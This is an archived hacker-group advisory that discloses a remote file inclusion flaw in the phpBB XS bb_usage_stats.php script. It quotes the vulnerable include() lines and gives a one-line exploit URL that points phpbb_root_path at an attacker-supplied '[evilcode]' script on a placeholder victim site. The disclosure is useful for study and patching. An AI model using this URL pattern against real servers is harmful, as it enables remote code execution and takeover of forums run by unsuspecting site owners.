TUCoPS :: Web BBS :: Frequently Exploited :: b06-4748.htm

phpBB XS (phpbb_root_path) Remote File Include
SolpotCrew Advisory #10 - phpBB XS (phpbb_root_path) Remote File Include
SolpotCrew Advisory #10 - phpBB XS (phpbb_root_path) Remote File Include


#############################SolpotCrew Community################################=0D
#=0D
#        phpBB XS (phpbb_root_path) Remote File Include=0D
#=0D
# Download file : http://www.phpbbxs.eu/dload.php?action=category&cat_id=2=0D 
#=0D
#################################################################################=0D
#=0D
#=0D
#       Bug Found By : NoGe a.k.a da_jackass =0D
#=0D
# contact: jong_amq@hotmail.com =0D 
# =0D
# Website : http://nyubicrew.org/adv/Noge_adv_02.txt=0D 
#=0D
################################################################################=0D
#=0D
#=0D
#      Greetz: skulmatic[thanks for sharing knowledge] h4ntu[for the video] olibekas solpotcrew PremanMedan=0D
#              yooogy[pa bozz] siwa^lima sagu mousekill ilalang13=0D
#              #papmahackerlink #nyubi #maluku-hacker #papuahacker=0D
#              =0D
###############################################################################=0D
# Vulnerable found in bb_usage_stats.php =0D
=0D
line 24 include($phpbb_root_path . 'bb_usage_stats/includes/bb_usage_stats_constants.' . $phpEx); =0D
line 25 include($phpbb_root_path . 'bb_usage_stats/language/lang_' . $board_config['default_lang'] . '/bb_usage_stats_lang.' . $phpEx); =0D
line 26 include($phpbb_root_path . 'bb_usage_stats/includes/bb_usage_stats_functions.' . $phpEx); =0D
=0D
=0D
# Exploit =0D
=0D
http://victim.com/[path]/bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path=[evilcode] =0D 
=0D
######################################E.O.F##################################

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH